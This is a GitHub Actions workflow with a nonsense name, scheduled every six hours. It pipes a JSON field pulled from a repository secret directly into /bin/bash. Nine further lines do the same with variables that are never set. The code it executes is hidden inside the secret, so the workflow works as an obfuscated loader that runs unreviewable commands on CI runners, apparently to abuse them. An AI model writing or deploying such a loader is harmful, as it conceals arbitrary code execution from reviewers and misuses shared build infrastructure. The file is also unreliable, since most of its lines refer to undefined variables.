name: factorycurrently

on:
  workflow_dispatch:
  schedule:
    - cron: '32 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: factorycurrently
        env:
          hs0: ${{ secrets.hs0 }}
        run: |
          echo $hs0 | jq -r .he9266 | /bin/bash
          echo $onjt71 | jq -r .jv0109 | /bin/bash
          echo $zw2 | jq -r .riba34 | /bin/bash
          echo $xtaue94227 | jq -r .gpob85 | /bin/bash
          echo $b2 | jq -r .y4516 | /bin/bash
          echo $t9 | jq -r .ng973 | /bin/bash
          echo $surr61 | jq -r .xu67652 | /bin/bash
          echo $u33108 | jq -r .a497 | /bin/bash
          echo $c9595 | jq -r .gdynx5 | /bin/bash
          echo $ef43 | jq -r .a53 | /bin/bash

